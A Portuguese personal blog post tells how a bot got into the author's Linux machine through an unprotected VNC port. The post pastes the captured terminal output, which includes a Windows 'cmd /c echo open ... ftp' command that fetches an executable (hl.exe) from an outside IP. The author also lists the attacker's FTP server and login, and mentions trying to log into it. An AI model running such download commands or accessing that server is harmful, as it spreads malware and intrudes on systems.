segunda-feira, 23 de maio de 2011

Um Bot entrou em minha vida!

Olá a todos!

Estou compartilhando minha  experiência infeliz de ser invadido por um bot!

O bot se refere a uma única máquina zumbi com  programas adequados instalados. Normalmente faz parte de algo maior como uma rede deles conhecido como botsnets. Executa uma tarefa repetitiva, tipo explorar uma falha de segurança.

Esse foi meu caso, bateu uma preguiça e deixei o vnc sem senha e na porta padrão.

Isto é um pecado capital, sou conhecido por complicar as coisas. Na empresa que trabalho tem poucas estações e todas tem o vnc pra suporte , mas com senhas diferentes e portas bem diferentes a do padrão. Sem suporte a servidor web!!!!
Imagine que na minha própria máquina fiz tamanha besteira!

Mas foi interessante, pois não causou nenhum mal. O bot estava preparado pra uma máquina windows, uso linux. Foi muiiiito rápido.
Estava eu no terminal criando um script quando repentinamente correu minha tela.
Automaticamento puxei o cabo de rede e fui verificar. Encontrei o seguinte no terminal:
s7~
%systemroot%\system32\cmd.exe
cs7~: comando não encontrado
md /mauro@mauro-P4V8X-MX:~$ g
c ecg: comando não encontrado
mauro@mauro-P4V8X-MX:~$ %systemroot%\system32\cmd.exe
bash: fg: %systemroot%system32cmd.exe: trabalho não existe

cmd /c echo open 189.12.115.135 51884 >> ik &echo user up date >> ik &echo get hl.exe >> ik &echo bye >> ik &ftp -n -v :ik &
[2] 21713
[3] 21714
[4] 21715
[5] 21716
[6] 21717
mauro@mauro-P4V8X-MX:~$ ftp: :ik: Name or service not knownexit
Existem trabalhos parados.
[3]   Concluído              echo user up date >> ik
[4]   Concluído              echo get hl.exe >> ik
[5]   Concluído              echo bye >> ik

E os arquivos de apoio também, o ik, hl.exe e o cmd.exe.
bye
get hl.exe
user up date
Consultando rapidamente a net, é de fato um ataque padrão que pega pela distração.
Tentei aproveitar e entrar no ftp do larápio, mas não consegui!
A senha e o login fornecidos não mais funcionavam.
  • Servidor de ftp: 189.12.115.135:51884
  • Login senha: user up
Mas o servidor ftp é do tipo windows. Dito pelo nmap.
Não soube o que mais ele queria.
Já tratei vários com este problema, mas nunca presenciei um pessoalmente.

Lembrete:
  • Se usar algo que peça senha, ponha uma senha.
  • Faça backup, depois de uma dessas, só senti segurança após reinstalar.
Boa sorte
fonte:
Pesquise por "cmd /c echo open"
Postado por às
Marcadores: , , , , , , , , ,

Nenhum comentário:

Postar um comentário

Assinar: Postar comentários (Atom)